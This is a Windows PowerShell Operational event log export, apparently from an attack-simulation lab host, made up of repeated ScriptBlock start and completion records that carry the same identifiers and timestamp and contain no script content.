LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472543
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472542
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472541
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472540
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472539
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472538
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472537
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472536
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472535
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472534
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472533
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472532
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472531
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472530
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472529
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472528
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472527
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472526
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472525
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472524
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472523
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472522
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472521
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472520
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472519
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472518
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472517
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472516
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472515
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472514
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472513
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472512
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472511
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472510
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472509
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472508
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472507
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472506
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472505
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472504
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472503
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472502
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472501
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472500
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472499
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472498
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472497
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472496
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472495
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472494
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472493
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472492
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472491
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472490
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472489
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
